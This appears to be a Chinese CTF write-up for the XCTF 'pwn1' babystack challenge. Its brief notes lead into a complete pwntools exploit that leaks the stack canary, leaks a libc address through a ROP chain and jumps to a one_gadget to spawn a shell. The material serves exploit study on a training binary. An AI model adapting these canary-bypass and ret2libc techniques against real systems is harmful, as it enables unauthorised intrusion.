xctf pwn1

这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了

本机的库是 2.23 所以我也按照 2.23来打了       然后这个题 可以用system  也可以用 one_gadget 用的是 one_gadget

然后说一下这个题

看起来  就是一个简单的 x64的栈溢出 

然后我们看一下保护

这里面  有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我们要绕过的点

然后 其实这个题直接搞就可以了

下面是exp

#coding:utf-8
from pwn import *
#from roputils import *
context.log_level='debug'

#io=remote('111.198.29.45',52324)
io=process('./babystack')
elf=ELF('./babystack')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
main=0x400908
pop_rdi_addr=0x400a93

def edit(a):
	io.sendlineafter('>> ','1')
	io.sendline(a)

def show():
	io.sendlineafter('>> ','2')

edit('a'*0x88)
show()
io.recvuntil('aaaaaa\n')
canary=u64(io.recv()[0:7].rjust(8,'\x00'))
log.success('canary:'+hex(canary))
pay='a'*0x88+p64(canary)+'a'*0x8
pay+=p64(pop_rdi_addr)+p64(elf.got['puts'])+p64(elf.plt['puts'])
pay+=p64(main)
io.sendline('1')
io.sendline(pay)
io.sendlineafter('>> ','3')
puts_addr=u64(io.recv()[:6].ljust(8,'\x00'))
log.success('puts_addr:'+hex(puts_addr))
libc_puts=libc.symbols['puts']
libc_base=puts_addr-libc_puts
one_gadget_addr=libc_base+0xf02a4
log.success('libc_base:'+hex(libc_base))
log.success('one_gadget_addr:'+hex(one_gadget_addr))
pay='a'*0x88+p64(canary)+'a'*0x8+p64(one_gadget_addr)
io.sendline('1')
io.sendline(pay)
io.sendlineafter('>> ','3')


io.interactive()